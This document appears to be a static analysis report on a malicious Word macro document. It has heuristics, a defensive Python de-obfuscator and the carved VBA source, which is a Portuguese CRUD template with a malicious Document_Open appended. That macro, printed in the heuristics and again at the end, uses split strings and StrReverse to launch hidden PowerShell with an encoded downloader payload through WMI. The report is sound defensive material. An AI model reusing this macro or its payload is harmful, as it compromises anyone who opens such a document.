Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 857f916434fcf15c…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 98.0 KB
Created: 2020-03-06 13:57:00
Authoring application: Microsoft Office Word
First seen: 2020-07-02
MD5: c9f6610daad3f3a3fc27d96b441910c3
SHA-1: 63b9ddf30f5ef03e1d477680cf92e56229bf3575
SHA-256: 857f916434fcf15c1cb2ded81bd5386a197341c1739b755a7a12e46135708045
Risk score: 272

Malware Insights

MITRE ATT&CK
T1566.001 Phishing: Spearphishing Attachment
T1204.002 User Execution: Malicious File
T1059.005 Command and Scripting Interpreter: Visual Basic
T1047 Windows Management Instrumentation
T1059.001 Command and Scripting Interpreter: PowerShell

The sample's only auto-executing entry point is a `Document_Open` macro that calls `GetObject` on a WMI moniker and invokes `Win32_Process.Create` on the returned object (no `CreateObject` call is present). Both the moniker and the command line are obfuscated: `winmgmts:root\cimv2:Win32_Process` is assembled from seven short literals joined with `+`, and the command line is passed through `StrReverse`. Read backwards, the tail of that literal (`... ne- neddih elytswodniw- llehsrewop`) is `powershell -windowstyle hidden -en ...`, so the macro starts a hidden PowerShell process with a base64-encoded (`-EncodedCommand`) script; the encoded body is not decoded in this report. No exploit is involved: execution relies on the user enabling macros, and the document body explicitly instructs the user to enable editing and content, a common social engineering tactic to bypass Office macro protection. The decoded VBA (the carved `macros.bas` below) is otherwise an unrelated Portuguese-language UserForm CRUD template (paging, record navigation, ADO catalogue lookups) whose handlers sit in the `ThisDocument` module, where they never fire, and which reference objects defined nowhere in the extracted source; it is padding or a repurposed legitimate project, with the malicious `Document_Open` appended at the end. The ClamAV signature (Doc.Downloader.Generic-7611954-0) classifies the sample as a downloader, consistent with a hidden encoded PowerShell stage.

Heuristics (9)

  • ClamAV: Doc.Downloader.Generic-7611954-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7611954-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain; the WMI class name is often hidden through string concatenation or helper functions, as it is here. Because the process is created by the WMI service, the child (here PowerShell) is spawned by the WMI provider host, WmiPrvSE.exe, rather than by WINWORD.EXE, so detections that key only on an Office parent process miss it.
    Matched line in script
    Sub Document_Open()
    Call GetObject("win" + "mgmts:ro" + "ot\c" + "imv2:Wi" + "n32_P" + "ro" + "cess"). _
    Create(StrReverse("=AgZAUG" + "AyBAdAACA0BwcAkGAMBAdA4GAlBQbAUHAnBgcAEEAtAAIA0GAvBwYA4CAvBAZAkGA2BAIAMHAz" + "BQZAMGAvBgcAAFAtAAdAIHAhBAdAMFAgAAIAsDAmBQZAIHA0BAIAEGAyBQZAYGAzBAIAUGAkBwbAMGAlBAZA0CAgAAbAkGA0BQdAQHAyBQ" + "ZAMGAgAwOAICAQBQTAUEAUBgOAYHAuBQZAQCAiAAIAgGA0BQYAAFAtAAIA4GAvBQaAQHAhBwYA8GAMBQLAQHAlBwUAACA7AgIA0GAvBwYA4CAlBQWAAHARBAXAAF" + "ANBQRAQFA6AgdA4GAlB" + "AJAICAsAgIAEGAyBQZAYGAzBAXAAFANBQRAQFA6AgdA4GAlBAJAICAs" + "AgIA0GAvBwYA4CAvBAZAkGA2BAXAAFANBQRAQFA6AgdA4GAlBAJAICAgAgbA8GApBA …
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal; here the reassembled name is the WMI moniker winmgmts:root\cimv2:Win32_Process. Splitting such a name across string concatenation has no purpose other than evading keyword scanning.
    Matched line in script: the same Document_Open statement quoted under OLE_VBA_WMI_PROCESS_CREATE above.
  • GetObject call high OLE_VBA_GETOBJ
    GetObject binds to a COM object through a moniker string; with a winmgmts: moniker it returns a WMI object, which is how the macro reaches Win32_Process.Create without a conventional Shell or WScript.Shell call.
    Matched line in script: the same Document_Open statement quoted under OLE_VBA_WMI_PROCESS_CREATE above.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open runs automatically when the document is opened with macros enabled, making it the entry point of the chain.
    Matched line in script: the same Document_Open statement quoted under OLE_VBA_WMI_PROCESS_CREATE above.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML XML namespace, expected in any document that carries drawing markup; it is not an indicator on its own.
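The two obfuscation heuristics above (OLE_VBA_WMI_PROCESS_CREATE and OLE_VBA_SPLIT_KEYWORD_OBFUSCATION) both hinge on undoing the same two tricks: literal concatenation and StrReverse. The Python below is an added example written for this page, not the scanner's own code: it folds the concatenations, evaluates StrReverse, checks for the winmgmts → Win32_Process → .Create chain, and decodes the -en argument (base64 over UTF-16LE). The input is a constructed excerpt of the sample's Document_Open statement with the long reversed base64 literal cut down to its last two chunks; the list of accepted -EncodedCommand prefixes and the function names are assumptions.

```python
"""De-obfuscate the sample's Document_Open and flag the WMI Win32_Process.Create
chain (added example for this page, not the scanner's code)."""
import base64
import re

# Constructed excerpt: the page's Document_Open statement with the reversed
# base64 literal shortened to its last two chunks. TerfajK is the sample's own
# undeclared variable that receives the new process ID.
SAMPLE_VBA = r'''Sub Document_Open()
Call GetObject("win" + "mgmts:ro" + "ot\c" + "imv2:Wi" + "n32_P" + "ro" + "cess"). _
Create(StrReverse("AYGAzBgbAEGAyBAVAMHA0BQaAIEA" + "gAQZAwGA1BAZA8GANBQLAQHAyBwbAAHAtBQS ne- neddih elytswodniw- llehsrewop"), Null, Null, TerfajK)
End Sub
'''

LIT = r'"((?:[^"]|"")*)"'                        # one VBA string literal ("" escapes a quote)
CONCAT = re.compile(LIT + r'\s*[+&]\s*' + LIT)    # "a" + "b"  or  "a" & "b"
STRREVERSE = re.compile(r'StrReverse\(\s*' + LIT + r'\s*\)', re.IGNORECASE)
CREATE_ARG = re.compile(r'\.\s*Create\s*\(\s*' + LIT, re.IGNORECASE)
WMI_CHAIN = re.compile(r'winmgmts:.*?Win32_Process.*?\.\s*Create\s*\(',
                       re.IGNORECASE | re.DOTALL)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the
# prefixes listed here are an assumption covering the ones seen in the wild.
ENCODED_ARG = re.compile(r'-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)',
                         re.IGNORECASE)


def join_continuations(src: str) -> str:
    """Glue VBA line continuations (a trailing ' _') back into one statement."""
    return re.sub(r'[ \t]_[ \t]*\r?\n[ \t]*', ' ', src)


def fold_string_concat(src: str) -> str:
    """Merge adjacent literals joined with + or & until none remain."""
    prev = None
    while prev != src:
        prev = src
        src = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
    return src


def fold_strreverse(src: str) -> str:
    """Evaluate StrReverse("literal") in place, as the VBA runtime would."""
    return STRREVERSE.sub(lambda m: '"' + m.group(1)[::-1] + '"', src)


def normalize_vba(src: str) -> str:
    return fold_strreverse(fold_string_concat(join_continuations(src)))


def detect_wmi_process_create(src: str) -> bool:
    """True when a winmgmts moniker reaches Win32_Process ... .Create( after de-obfuscation."""
    return WMI_CHAIN.search(normalize_vba(src)) is not None


def extract_command_line(src: str):
    """The first string handed to Win32_Process.Create, or None."""
    m = CREATE_ARG.search(normalize_vba(src))
    return m.group(1).replace('""', '"') if m else None


def decode_encoded_command(cmdline: str):
    """Decode a PowerShell -EncodedCommand argument: base64 of UTF-16LE text."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    raw = base64.b64decode(blob + '=' * (-len(blob) % 4))   # tolerate stripped padding
    return raw.decode('utf-16-le', errors='replace')


def triage(src: str) -> dict:
    """One-shot summary of what the macro would actually execute."""
    cmd = extract_command_line(src)
    return {
        'wmi_process_create': detect_wmi_process_create(src),
        'command_line': cmd,
        'decoded_payload': decode_encoded_command(cmd) if cmd else None,
    }


if __name__ == '__main__':
    for key, value in triage(SAMPLE_VBA).items():
        print(f'{key}: {value}')
```

Run against the excerpt, the normalised statement reads `GetObject("winmgmts:root\cimv2:Win32_Process"). Create("powershell -windowstyle hidden -en ...")`, and the shortened blob decodes to the opening of the encoded script. On the full literal from the sample the same functions return the complete command; the decoder deliberately pads rather than rejecting, because reversed or truncated blobs often arrive without their `=` padding.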

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13664 bytes
SHA-256: 413f36734d8696e1c82a5b3472bc635831309e4f47b635fff71212c450911a22
Detection
ClamAV: No threats found (the Doc.Downloader.Generic-7611954-0 signature above fired on the OLE container, not on this decoded source)
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub UserForm_Initialize()
    
    Call PopulaCombos
    
    Call EventosCampos
    
    Call BuscaRegistros

End Sub
Private Sub UserForm_Terminate()
    
    Set oLoja = Nothing
    Set myRst = Nothing
    
    Call Desconecta
    
End Sub
Private Sub btnIncluir_Click()
    
    Call PosDecisaoTomada("Inclusao")
    
End Sub
Private Sub btnAlterar_Click()
    
    Call PosDecisaoTomada("Alteracao")

End Sub
Private Sub btnExcluir_Click()

    Call PosDecisaoTomada("Exclusao")
    
End Sub
Private Sub PosDecisaoTomada(Decisao As String)

    btnCancelar.Visible = True: btnConfirmar.Visible = True
    btnConfirmar.Caption = "Confirmar " & Decisao
    btnCancelar.Caption = "Cancelar " & Decisao
    
    btnIncluir.Visible = False: btnAlterar.Visible = False: btnExcluir.Visible = False
    
    MultiPage1.Value = 1
    
    If Decisao <> "Exclusao" Then
    
        If Decisao = "Inclusao" Then
        
            Call Campos("Limpar")
            
        End If
        
        Call Campos("Habilitar")
        
        txbLoja.SetFocus
        
    End If
    
    MultiPage1.Pages(0).Enabled = False
    
End Sub
Private Sub btnConfirmar_Click()
    
    Call Gravar(Replace(btnConfirmar.Caption, "Confirmar ", ""))
    
End Sub
Private Sub btnCancelar_Click()
    
    btnIncluir.Visible = True: btnAlterar.Visible = True: btnExcluir.Visible = True
    btnConfirmar.Visible = False: btnCancelar.Visible = False
    
    Call Campos("Limpar")
    Call Campos("Desabilitar")
    
    btnAlterar.Enabled = False
    btnExcluir.Enabled = False
    btnIncluir.SetFocus
   
    MultiPage1.Value = 0
    
    lstPrincipal.ListIndex = -1 ' Clear the selection
    
End Sub
Private Sub lstPrincipal_Change()

    Dim n As Long
    
    If lstPrincipal.ListIndex >= 0 Then
    
        btnAlterar.Enabled = True
        btnExcluir.Enabled = True
    
        With oLoja
    
            .CRUD eCrud.Read, (CLng(lstPrincipal.List(lstPrincipal.ListIndex, 1)))
    
            lblCabID.Caption = IIf(.ID = 0, "", Format(.ID, "000000"))
            lblCabLoja.Caption = .Loja
            txbLoja.Text = .Loja
            
        End With
        
    End If

End Sub
Private Sub Campos(Acao As String)
    
    Dim sDecisao    As String
    Dim b           As Boolean
    
    sDecisao = Replace(btnConfirmar.Caption, "Confirmar ", "")
    
    If Acao <> "Limpar" Then
    
        If Acao = "Desabilitar" Then
            b = False
        ElseIf Acao = "Habilitar" Then
            b = True
        End If
        
        MultiPage1.Pages(0).Enabled = Not b
        
        txbLoja.Enabled = b: lblLoja.Enabled = b
        
    Else
    
        lblCabID.Caption = ""
        lblCabLoja.Caption = ""
        txbLoja.Text = Empty
             
    End If

End Sub
Private Sub lstPrincipalPopular(Pagina As Long)

    Dim n           As Byte
    Dim vNascimento As Variant
    Dim vSalario    As Variant
    Dim oLegenda     As Control
    
    ' Reset the legend colours
    For n = 1 To myRst.PageSize
        Set oLegenda = Controls("l" & Format(n, "00")): oLegenda.BackColor = &H8000000F
    Next n

    ' Set which Recordset page will be displayed
    myRst.AbsolutePage = Pagina
    
    With lstPrincipal
        .Clear                                      ' Clear contents
        .ColumnCount = 2                            ' Set the number of columns
        .ColumnWidths = "180 pt; 0pt;"              ' Set the column widths
        .Font = "Consolas"                          ' Set the font
        
        n = 1
        
        While Not myRst.EOF = True And n <= myRst.PageSize
            
            ' Fill the ListBox
            .AddItem
            
            .List(.ListCount - 1, 0) = myRst.Fields("loja").Value
            .List(.ListCount - 1, 1) = myRst.Fields("id").Value
            
            ' Colour the legend
'            Set oLegenda = Controls("l" & Format(n, "00"))
'
'            If myRst.Fields("sexo").Value = "F" Then
'                oLegenda.BackColor = &HFF80FF
'            ElseIf myRst.Fields("sexo").Value = "M" Then
'                oLegenda.BackColor = &HFF8080
'            Else
'                oLegenda.BackColor = &H8000000F
'            End If
            
            ' Next record
            myRst.MoveNext: n = n + 1
            
        Wend
        
    End With
    
    ' Position the page-navigation scrollbar
    lblPaginaAtual.Caption = Pagina
    lblNumeroPaginas.Caption = myRst.PageCount
    bAtualizaScrool = False: scrPagina.Value = CLng(lblPaginaAtual.Caption): bAtualizaScrool = True
    lblTotalRegistros.Caption = Format(myRst.RecordCount, "#,##0")
    
    ' Handle the navigation buttons
    Call TrataBotoesNavegacao

End Sub
Private Sub Gravar(Decisao As String)

    Dim vbResposta  As VbMsgBoxResult
    Dim e           As eCrud
    
    vbResposta = MsgBox("Deseja realmente fazer a " & Decisao & "?", vbYesNo + vbQuestion, "Pergunta")
    
    If vbResposta = vbYes Then
    
        If Decisao <> "Exclusao" Then
        
            If txbLoja.Text = Empty Then
                MsgBox "Campo 'Loja' e obrigatorio", vbCritical: MultiPage1.Value = 1: txbLoja.SetFocus
            Else
                
                With oLoja
                    
                    .Loja = Replace(txbLoja.Text, "'", "`")
                    
                    If Decisao = "Inclusao" Then
                        .CRUD eCrud.Create
                    Else
                        .CRUD eCrud.Update, .ID
                    End If
                    
                End With
                
                MsgBox Decisao & " realizada com sucesso.", vbInformation, Decisao & " de registro"
                
                Call BuscaRegistros
                                    
            End If
        
        Else ' Deletion
        
            oLoja.CRUD eCrud.Delete, oLoja.ID
                
            MsgBox Decisao & " realizada com sucesso.", vbInformation, Decisao & " de registro"
            
            Call BuscaRegistros
            
        End If
               
    ElseIf vbResposta = vbNo Then
        
        If Decisao = "Exclusao" Then
            
            Call btnCancelar_Click
            
        End If
        
    End If
    
End Sub
Private Sub EventosCampos()

    ' Declare variables
    Dim oControle   As MSForms.Control
    Dim oEvento     As c__EventoCampo
    Dim sTag        As String
    Dim sField()    As String
    
    ' Loop over every TextBox and wire up events
    ' according to each field's type
    For Each oControle In Me.Controls
    
        If Len(oControle.Tag) > 0 Then
        
            If TypeName(oControle) = "TextBox" Then
            
                Set oEvento = New c__EventoCampo
                
                With oEvento
                
                    sField() = Split(oControle.Tag, ".")
                    
                    oControle.ControlTipText = cat.Tables(sField(0)).Columns(sField(1)).Properties("Description").Value
                    
                    .FieldType = cat.Tables(sField(0)).Columns(sField(1)).Type
                    .MaxLength = cat.Tables(sField(0)).Columns(sField(1)).DefinedSize
                    .Nullable = cat.Tables(sField(0)).Columns(sField(1)).Properties("Nullable")
                    
                    Set .cGeneric = oControle
                    
                End With
                
                colControles.Add oEvento
                
            End If
            
        End If
    Next

End Sub
Private Sub btnFiltrar_Click()

    Call BuscaRegistros

End Sub
Private Sub BuscaRegistros(Optional Ordem As String)

    Dim n As Byte
    Dim o As Control

    Set myRst = oLoja.Todos(Ordem, True)
    
    If myRst.PageCount > 0 Then
        
        bAtualizaScrool = False
        
        With scrPagina
            .Max = myRst.PageCount
            .Value = myRst.PageCount
        End With
        
        Call lstPrincipalPopular(myRst.PageCount)
        
    Else
    
        lstPrincipal.Clear
        
        For n = 1 To myRst.PageSize
            Set o = Controls("l" & Format(n, "00")): o.BackColor = &H8000000F
        Next n
        
    End If
    
    Call btnCancelar_Click
    

End Sub
Private Sub TrataBotoesNavegacao()

    If CLng(lblPaginaAtual.Caption) = myRst.PageCount And CLng(lblPaginaAtual.Caption) > 1 Then
    
        btnPaginaInicial.Enabled = True
        btnPaginaAnterior.Enabled = True
        btnPaginaFinal.Enabled = False
        btnPaginaSeguinte.Enabled = False
        
    ElseIf CLng(lblPaginaAtual.Caption) < myRst.PageCount And CLng(lblPaginaAtual.Caption) = 1 Then
    
        btnPaginaInicial.Enabled = False
        btnPaginaAnterior.Enabled = False
        btnPaginaFinal.Enabled = True
        btnPaginaSeguinte.Enabled = True
        
    ElseIf CLng(lblPaginaAtual.Caption) = myRst.PageCount And CLng(lblPaginaAtual.Caption) = 1 Then
    
        btnPaginaInicial.Enabled = False
        btnPaginaAnterior.Enabled = False
        btnPaginaFinal.Enabled = False
        btnPaginaSeguinte.Enabled = False
    
    Else
    
        btnPaginaInicial.Enabled = True
        btnPaginaAnterior.Enabled = True
        btnPaginaFinal.Enabled = True
        btnPaginaSeguinte.Enabled = True
        
    End If

End Sub
Private Sub btnPaginaInicial_Click()
    
    Call lstPrincipalPopular(1)
    
End Sub
Private Sub btnPaginaAnterior_Click()

    Call lstPrincipalPopular(CLng(lblPaginaAtual.Caption) - 1)
    
End Sub
Private Sub btnPaginaSeguinte_Click()

    Call lstPrincipalPopular(CLng(lblPaginaAtual.Caption) + 1)

End Sub
Private Sub btnPaginaFinal_Click()

    Call lstPrincipalPopular(myRst.PageCount)
    
End Sub
Private Sub btnRegistroAnterior_Click()

        If lstPrincipal.ListIndex > 0 Then
        
            lstPrincipal.ListIndex = lstPrincipal.ListIndex - 1
            
        ElseIf lstPrincipal.ListIndex = 0 And CLng(lblPaginaAtual.Caption) > 1 Then
            
            Call lstPrincipalPopular(CLng(lblPaginaAtual.Caption) - 1)
            
            lstPrincipal.ListIndex = myRst.PageSize - 1
            
        ElseIf CLng(lblPaginaAtual.Caption) = 1 And lstPrincipal.ListIndex = 0 Then
        
            MsgBox "Primeiro registro"
            Exit Sub
            
        Else
        
            lstPrincipal.ListIndex = -1
            
        End If
        
End Sub
Private Sub btnRegistroSeguinte_Click()

    If lstPrincipal.ListIndex = -1 Then
        
        lstPrincipal.ListIndex = 0
    
    ElseIf lstPrincipal.ListIndex = myRst.PageSize - 1 And CLng(lblPaginaAtual.Caption) < myRst.PageCount Then
        
        Call lstPrincipalPopular(CLng(lblPaginaAtual.Caption) + 1)
        
        lstPrincipal.ListIndex = 0
        
    ElseIf CLng(lblPaginaAtual.Caption) = myRst.PageCount And (lstPrincipal.ListIndex + 1) = lstPrincipal.ListCount Then
    
        MsgBox "Ultimo registro"
        Exit Sub
        
    Else
    
        lstPrincipal.ListIndex = lstPrincipal.ListIndex + 1
    
    End If
    
End Sub
Private Sub scrPagina_Change()

    If bAtualizaScrool = True Then
        
        Call lstPrincipalPopular(scrPagina.Value)
        
    End If

End Sub
Private Sub PopulaCombos()

'    With cbbSexo
'        .Clear
'        .ColumnCount = 2
'        .ColumnWidths = "60pt; 0pt;"
'
'        .AddItem
'        .List(.ListCount - 1, 0) = "MASCULINO"
'        .List(.ListCount - 1, 1) = "M"
'
'        .AddItem
'        .List(.ListCount - 1, 0) = "FEMININO"
'        .List(.ListCount - 1, 1) = "F"
'    End With

End Sub
Private Sub lstPrincipal_DblClick(ByVal Cancel As String)

    MultiPage1.Value = 1
    
End Sub
Private Sub lblHdNome_Click()

    Call BuscaRegistros("loja")
    
End Sub

Sub Document_Open()
Call GetObject("win" + "mgmts:ro" + "ot\c" + "imv2:Wi" + "n32_P" + "ro" + "cess"). _
Create(StrReverse("=AgZAUG" + "AyBAdAACA0BwcAkGAMBAdA4GAlBQbAUHAnBgcAEEAtAAIA0GAvBwYA4CAvBAZAkGA2BAIAMHAz" + "BQZAMGAvBgcAAFAtAAdAIHAhBAdAMFAgAAIAsDAmBQZAIHA0BAIAEGAyBQZAYGAzBAIAUGAkBwbAMGAlBAZA0CAgAAbAkGA0BQdAQHAyBQ" + "ZAMGAgAwOAICAQBQTAUEAUBgOAYHAuBQZAQCAiAAIAgGA0BQYAAFAtAAIA4GAvBQaAQHAhBwYA8GAMBQLAQHAlBwUAACA7AgIA0GAvBwYA4CAlBQWAAHARBAXAAF" + "ANBQRAQFA6AgdA4GAlB" + "AJAICAsAgIAEGAyBQZAYGAzBAXAAFANBQRAQFA6AgdA4GAlBAJAICAs" + "AgIA0GAvBwYA4CAvBAZAkGA2BAXAAFANBQRAQFA6AgdA4GAlBAJAICAgAgbA8GApBAdAEGAuBQaAQHAzBQZAQEA" + "tAAIAQHAhBAZA4CAlBQWAAHARBwLAUGA0BQaAMHAuAgNAAHAyBwbAMGAvAwLAoDAwBAdAQHAoBALAQHAhBAZA4CArBgSAEGAlBgbA8CAlBAdAkGAzBgLAYDAwBgcA8GAjBwLA8CA6AAc" + "AQHA0BAaAwCA0BQYAQGAuAQZAoGABBQdAUGAJBwLAUGA0BQaAMHAuAgNAAHAyBwbAMGAvAwLAoDAwBAdAQHAoBAIAUGAjBgcAUHAvBwUA0" + "CAgAgcAUGAmBwcA4GAhBgcAQFAzBAdAkGACBQLAQHAyBQYAQHATBAIAsDAyBQZ" + "AYGAzBgbAEGAyBAVAMHA0BQaAIEA" + "gAQZAwGA1BAZA8GANBQLAQHAyBwbAAHAtBQS ne- neddih elytswodniw- llehsrewop"), Null, Null, TerfajK)

End Sub